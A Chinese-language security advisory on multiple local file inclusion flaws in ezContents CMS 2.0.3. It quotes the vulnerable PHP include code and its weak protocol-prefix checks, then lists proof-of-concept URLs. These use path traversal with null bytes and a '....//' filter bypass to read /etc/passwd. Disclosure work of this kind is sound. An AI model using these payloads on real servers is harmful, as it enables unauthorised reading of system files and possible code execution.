安全研究
安全漏洞
ezContents CMS多个本地文件包含漏洞
发布日期:2008-08-25
更新日期:2008-08-26
受影响系统:
VisualShapers ezContents 2.0.3描述:
BUGTRAQ ID: 30821
ezContents是一款开放源代码内容管理系统。
ezContents的多个脚本没有正确地验证输入参数,远程攻击者可以通过包含本地任意资源导致执行任意代码。
1. /module.php脚本本地文件包含漏洞
32-42行和141-145行中的漏洞代码
--------------------------
#################################################
$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");
if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) \
$HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"]; if \
((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) \
$HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];
$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);
...
if (isExternalLink ($HTTP_GET_VARS["link"])) {
ECHO 'Remote Code Execution Patch Installed on this implementation of \
ezContents'; } else {
include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);
}
#################################################
/include/functions.php脚本中的isExternalLink()函数用于检查远程包含尝试。
768-779行
-------------------
#################################################
function isExternalLink ($linkref)
{
if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == \
'https:') ||
(substr($linkref,0,5) == 'file:') || \
(substr($linkref,0,4) == 'ftp:') ||
(substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == \
'mailto:') ||
(substr($linkref,0,5) == 'news:') || \
(substr($linkref,0,7) == 'telnet:') || (substr($linkref,0,5) == 'wais:') ) {
return True;
} else {
return False;
}
} // isExternalLink
#################################################
2. /modules/diary/showdiary.php、/modules/diary/showeventlist.php、/modules/gallery/showgallery.php和/modules/reviews/showreviews.php脚本中的本地文件包含
成功攻击要求打开了register_globals。
showdiary.php文件32-45行
--------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
$GLOBALS["ModuleName"] = 'diary';
if (!isset($GLOBALS["gsLanguage"])) { Header("Location: \
".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"] \
."/showdiary.php"); } include_once \
($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php"); include_once \
($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
/modules/moduleSec.php脚本用于检查包含尝试。
#################################################
function moduleExternalLink ($linkref)
{
if ($linkref != '') {
if ( (substr($linkref,0,5) == 'http:') || \
(substr($linkref,0,6) == 'https:') ||
(substr($linkref,0,5) == 'file:') || \
(substr($linkref,0,4) == 'ftp:') ||
(substr($linkref,0,7) == 'gopher:') || \
(substr($linkref,0,7) == 'mailto:') ||
(substr($linkref,0,5) == 'news:') || \
(substr($linkref,0,7) == 'telnet:') || (substr($linkref,0,5) == 'wais:') ) {
return True;
} else {
return False;
}
} else {
return False;
}
} // moduleExternalLink
if (!(isset($GLOBALS["rootdp"]))) {
ECHO 'Remote Code Execution Patch Installed on this implementation of \
ezContents'; DIE;
}
if ( (moduleExternalLink($GLOBALS["rootdp"])) || \
(moduleExternalLink($GLOBALS["modfiledir"])) ||
(moduleExternalLink($GLOBALS["modules_home"])) || \
(moduleExternalLink($GLOBALS["admin_home"])) || \
(moduleExternalLink($GLOBALS["language_home"])) ) {
ECHO 'Remote Code Execution Patch Installed on this implementation of \
ezContents'; DIE;
}
#################################################
3. /modules/diary/showdiarydetail.php、/modules/gallery/showgallerydetails.php、/modules/reviews/showreviewsdetails.php和/modules/news/shownewsdetails.php脚本中的本地文件包含
成功攻击要求打开了register_globals。
showdiarydetail.php文件32-46行
--------------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
$GLOBALS["ModuleName"] = 'diary';
include_once ($GLOBALS["admin_home"]."compile.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
4. /modules/diary/submit_diary.php、/modules/gallery/submit_gallery.php、/modules/guestbook/submit_guestbook.php、/modules/reviews/submit_reviews.php和/modules/news/submit_news.php脚本中的本地文件包含
成功攻击要求打开了register_globals。
submit_diary.php文件32-51行
-----------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
// Localisation variables (used for default values)
// Change these to suit your site preferences
//
$expiryperiod = 'm'; // Time period to calculate the banner expiry \
date (based on today's date) $expirynumber = 1;
$GLOBALS["ModuleName"] = 'diary';
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
5. /modules/news/archivednews_summary.php、/modules/news/news_summary.php文件中的本地文件包含
成功攻击要求打开了register_globals。
news_summary.php文件的32-41行
-----------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
include_once ($GLOBALS["admin_home"]."compile.php");
#################################################
6. /modules/diary/inlineeventlist.php、/modules/news/inlinenews.php文件中的本地文件包含
成功攻击要求打开了register_globals。
inlinenews.php文件的32-52行
---------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
global $EZ_SESSION_VARS;
$GLOBALS["ModuleName"] = 'news';
$linkref = $nLink;
$chainlink = explode('/',$linkref);
$modfilename = array_pop($chainlink);
$GLOBALS["modfiledir"] = implode('/',$chainlink);
include($GLOBALS["modfiledir"]."/moduleref.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
<*来源:Digital Security Research Group
链接:http://marc.info/?l=bugtraq&m=121968090815635&w=2
http://secunia.com/advisories/31606/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
建议:
厂商补丁:
VisualShapers
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.visualshapers.com/
浏览次数:2844
严重程度:0(网友投票)
绿盟科技给您安全的保障